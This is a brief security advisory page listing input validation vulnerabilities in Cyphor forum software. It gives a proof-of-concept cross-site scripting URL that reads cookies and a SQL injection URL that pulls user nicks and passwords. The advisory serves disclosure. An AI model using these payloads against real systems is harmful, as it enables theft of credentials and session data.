• info
• discussion
• exploit
• solution
• references

Cyphor Multiple Input Validation Vulnerabilities

No exploit is required. The following examples were provided:

Cross-site scripting:
http://www.example.com/[path]/include/footer.php?t_login=<script>alert(document.cookie)</script>

SQL injection:
http://www.example.com/[path]/newmsg.php?fid=''%20UNION%20SELECT%20nick,%20password,%20null,%20null%20FROM%20[table_pr\efix]users%20/*

The following exploit was also provided:

• /data/vulnerabilities/exploits/cyphor.php